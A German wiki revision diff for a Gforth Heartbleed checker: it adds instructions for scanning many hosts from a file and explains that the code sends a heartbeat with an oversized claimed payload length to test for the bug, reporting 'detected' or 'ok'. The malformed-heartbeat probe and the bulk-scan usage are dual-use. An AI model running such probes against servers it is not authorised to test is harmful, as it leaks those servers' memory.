Unterschiede

Hier werden die Unterschiede zwischen zwei Versionen angezeigt.

--- examples:heartbleed [2014-04-11 18:21] – bernd
+++ examples:heartbleed [2014-04-11 22:00] (aktuell) – bernd
@@ Zeile 7: / Zeile 7: @@
 </code>
-starten.  Wenn ein länglicher Hexdump kommt, ist das die Heartbleed-Antwort.
+starten.  Wenn ein länglicher Hexdump kommt, ist das die Heartbleed-Antwort.  Wenn man viele URLs hat, kann man die entweder per Shell-Script abarbeiten
+<code>
+cat <file> | xargs -L 1 gforth heartbleed.fs
+</code>
+oder Gforth starten und dann
+<code Forth>
+require heartbleed.fs
+s" <file>" file-heartbleed
+</code>
+Was der Code macht, ist schnell erklärt: Er schickt zuerst ein "Client Hello" an den Server, welcher daraufhin seine Zertifikate zurückschickt. Die werfe ich weg, denn ich will ja gar keine Verbindung aufbauen. Dann schicke ich einen Heartbeat ohne Payload und Padding, aber mit einer sehr langen Payload-Länge. Die erwarte ich dann als Antwort zurück; wenn ich sie bekomme, ist der Heartbleed-Bug vorhanden. Andere Antworten (etwa "Alert"), die TLS als Fehler schicken darf, werden ignoriert.
 <code Forth>
@@ Zeile 40: / Zeile 53: @@
     s" /dev/urandom" r/o open-file throw >r
     random32 4 + 28 r@ read-file throw drop r> close-file throw ;
-Create pollfds pollfd %size allot
 Variable buggy?
@@ Zeile 47: / Zeile 58: @@
 : get-heartbleed ( addr u port -- )  >r 2dup r>  buggy? off
     1000000 set-socket-timeout  >random
-    open-socket >r  r@ fileno pollfds fd l!  POLLIN pollfds events w!
+    open-socket >r
     TLS-header header# r@ write-socket
     BEGIN  r@ pad $10000 read-socket nip 0=  UNTIL
@@ Zeile 57: / Zeile 68: @@
     r> close-socket
     type buggy? @  IF  ." : Heartbleed detected"  ELSE  ." : Everything ok"  THEN  cr ;
+Variable files
+: file-heartbleed ( addr u -- )
+    r/w open-file throw files $[]slurp
+    files [: 443 get-heartbleed ;] $[]map ;
 script? [IF]